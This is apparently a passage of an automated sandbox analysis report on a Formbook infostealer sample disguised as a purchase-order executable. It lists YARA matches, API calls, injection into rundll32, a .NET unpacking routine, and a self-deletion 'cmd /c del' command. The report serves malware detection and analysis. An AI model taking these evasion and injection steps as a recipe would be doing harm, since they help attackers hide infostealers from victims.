        Source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 0_2_00EB5CC60_2_00EB5CC6
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 0_2_00EB57560_2_00EB5756
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 0_2_0308C2D40_2_0308C2D4
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 0_2_0308E7090_2_0308E709
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 0_2_0308E7180_2_0308E718
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 0_2_07C696C80_2_07C696C8
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_004010304_2_00401030
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_0041D8E84_2_0041D8E8
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_004090AD4_2_004090AD
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_004090B04_2_004090B0
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_0041C2334_2_0041C233
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_0041D4E94_2_0041D4E9
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_00402D874_2_00402D87
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_00402D904_2_00402D90
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_0041CEAC4_2_0041CEAC
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_0041C74A4_2_0041C74A
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_0041D73B4_2_0041D73B
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_0041BF8D4_2_0041BF8D
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_00402FB04_2_00402FB0
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_009E5CC64_2_009E5CC6
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_009E57564_2_009E5756
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E841F10_2_045E841F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0469100210_2_04691002
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046020A010_2_046020A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A20A810_2_046A20A8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045EB09010_2_045EB090
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A1D5510_2_046A1D55
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DF90010_2_045DF900
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D0D2010_2_045D0D20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045F412010_2_045F4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045ED5E010_2_045ED5E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460258110_2_04602581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045F6E3010_2_045F6E30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A2EF710_2_046A2EF7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460EBB010_2_0460EBB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025CC23310_2_025CC233
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025CD8E810_2_025CD8E8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025B90B010_2_025B90B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025B90AD10_2_025B90AD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025CCEAC10_2_025CCEAC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025CC74A10_2_025CC74A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025CD73B10_2_025CD73B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025CBF8D10_2_025CBF8D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025B2FB010_2_025B2FB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025CD4E910_2_025CD4E9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025B2D9010_2_025B2D90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025B2D8710_2_025B2D87
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 045DB150 appears 35 times
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_00418AB0 NtCreateFile,4_2_00418AB0
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_00418B60 NtReadFile,4_2_00418B60
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_00418BE0 NtClose,4_2_00418BE0
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_00418C90 NtAllocateVirtualMemory,4_2_00418C90
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_00418A6B NtCreateFile,4_2_00418A6B
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_00418B5A NtReadFile,4_2_00418B5A
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_00418BDA NtClose,4_2_00418BDA
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_00418C8A NtAllocateVirtualMemory,4_2_00418C8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04619860
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619840 NtDelayExecution,LdrInitializeThunk,10_2_04619840
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619540 NtReadFile,LdrInitializeThunk,10_2_04619540
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04619910
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046195D0 NtClose,LdrInitializeThunk,10_2_046195D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046199A0 NtCreateSection,LdrInitializeThunk,10_2_046199A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04619660
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619650 NtQueryValueKey,LdrInitializeThunk,10_2_04619650
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619A50 NtCreateFile,LdrInitializeThunk,10_2_04619A50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046196E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_046196E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046196D0 NtCreateKey,LdrInitializeThunk,10_2_046196D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619710 NtQueryInformationToken,LdrInitializeThunk,10_2_04619710
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619FE0 NtCreateMutant,LdrInitializeThunk,10_2_04619FE0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619780 NtMapViewOfSection,LdrInitializeThunk,10_2_04619780
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0461B040 NtSuspendThread,10_2_0461B040
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619820 NtEnumerateKey,10_2_04619820
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046198F0 NtReadVirtualMemory,10_2_046198F0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046198A0 NtWriteVirtualMemory,10_2_046198A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619560 NtWriteFile,10_2_04619560
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619950 NtQueueApcThread,10_2_04619950
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619520 NtWaitForSingleObject,10_2_04619520
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0461AD30 NtSetContextThread,10_2_0461AD30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046195F0 NtQueryInformationFile,10_2_046195F0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046199D0 NtCreateProcessEx,10_2_046199D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619670 NtQueryInformationProcess,10_2_04619670
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619A20 NtResumeThread,10_2_04619A20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619A00 NtProtectVirtualMemory,10_2_04619A00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619610 NtEnumerateValueKey,10_2_04619610
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619A10 NtQuerySection,10_2_04619A10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619A80 NtOpenDirectoryObject,10_2_04619A80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619760 NtOpenProcess,10_2_04619760
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619770 NtSetInformationFile,10_2_04619770
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0461A770 NtOpenThread,10_2_0461A770
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619730 NtQueryVirtualMemory,10_2_04619730
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04619B00 NtSetValueKey,10_2_04619B00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0461A710 NtOpenProcessToken,10_2_0461A710
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046197A0 NtUnmapViewOfSection,10_2_046197A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0461A3B0 NtGetContextThread,10_2_0461A3B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025C8AB0 NtCreateFile,10_2_025C8AB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025C8B60 NtReadFile,10_2_025C8B60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025C8BE0 NtClose,10_2_025C8BE0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025C8C90 NtAllocateVirtualMemory,10_2_025C8C90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025C8A6B NtCreateFile,10_2_025C8A6B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025C8B5A NtReadFile,10_2_025C8B5A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025C8BDA NtClose,10_2_025C8BDA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025C8C8A NtAllocateVirtualMemory,10_2_025C8C8A
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.469891421.0000000007B10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameIVectorView.dllN vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.452014572.000000000425F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIVectorView.dllN vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000000.425894922.0000000000F38000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCDSCollectionETWBCLProvi.exeH vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000000.458016496.0000000000A68000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCDSCollectionETWBCLProvi.exeH vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.545505707.00000000015AF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.459688448.000000000126B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.546674424.000000000196C000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.463062383.0000000001418000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.546039980.000000000173F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-INQUIRY-VALE-SP-2022-60.exe
        Source: PO-INQUIRY-VALE-SP-2022-60.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: PO-INQUIRY-VALE-SP-2022-60.exeReversingLabs: Detection: 17%
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeFile read: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe:Zone.IdentifierJump to behavior
        Source: PO-INQUIRY-VALE-SP-2022-60.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe"
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess created: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess created: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe"Jump to behavior
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-INQUIRY-VALE-SP-2022-60.exe.logJump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@22/17
        Source: PO-INQUIRY-VALE-SP-2022-60.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_01
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeMutant created: \Sessions\1\BaseNamedObjects\hqkHXPzXLFsvpff
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: PO-INQUIRY-VALE-SP-2022-60.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: PO-INQUIRY-VALE-SP-2022-60.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: wntdll.pdbUGP source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.459474350.0000000001155000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.544991181.0000000001490000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.545505707.00000000015AF000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.461497809.00000000012F9000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.544996697.0000000004281000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.546871204.0000000004418000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.459474350.0000000001155000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.544991181.0000000001490000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.545505707.00000000015AF000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.461497809.00000000012F9000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000A.00000003.544996697.0000000004281000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.546871204.0000000004418000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdb source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.546642645.0000000001960000.00000040.10000000.00040000.00000000.sdmp
        Source: Binary string: rundll32.pdbGCTL source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.546642645.0000000001960000.00000040.10000000.00040000.00000000.sdmp

        Data Obfuscation

        barindex
        .NET source code contains potential unpacker
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, ksu.cis.masaaki/CartDialog.cs.Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.eb0000.0.unpack, ksu.cis.masaaki/CartDialog.cs.Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 0.0.PO-INQUIRY-VALE-SP-2022-60.exe.eb0000.0.unpack, ksu.cis.masaaki/CartDialog.cs.Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.9.unpack, ksu.cis.masaaki/CartDialog.cs.Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.1.unpack, ksu.cis.masaaki/CartDialog.cs.Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.7.unpack, ksu.cis.masaaki/CartDialog.cs.Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.5.unpack, ksu.cis.masaaki/CartDialog.cs.Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.0.unpack, ksu.cis.masaaki/CartDialog.cs.Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.3.unpack, ksu.cis.masaaki/CartDialog.cs.Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.1.unpack, ksu.cis.masaaki/CartDialog.cs.Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.9e0000.2.unpack, ksu.cis.masaaki/CartDialog.cs.Net Code: BackView System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_00419B88 push ss; retf 4_2_00419B8B
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_0041D4DF push ecx; ret 4_2_0041D4E0
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_0041BDB5 push eax; ret 4_2_0041BE08
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_0041BE6C push eax; ret 4_2_0041BE72
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_0041BE02 push eax; ret 4_2_0041BE08
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_0041BE0B push eax; ret 4_2_0041BE72
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_0040C795 push ebp; ret 4_2_0040C7A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0462D0D1 push ecx; ret 10_2_0462D0E4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025C9B88 push ss; retf 10_2_025C9B8B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025CBE6C push eax; ret 10_2_025CBE72
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025CBE0B push eax; ret 10_2_025CBE72
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025CBE02 push eax; ret 10_2_025CBE08
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025BC795 push ebp; ret 10_2_025BC7A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025CD4DF push ecx; ret 10_2_025CD4E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_025CBDB5 push eax; ret 10_2_025CBE08
        Source: initial sampleStatic PE information: section name: .text entropy: 7.95977634644

        Hooking and other Techniques for Hiding and Protection

        barindex
        Self deletion via cmd delete
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe"
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe"Jump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
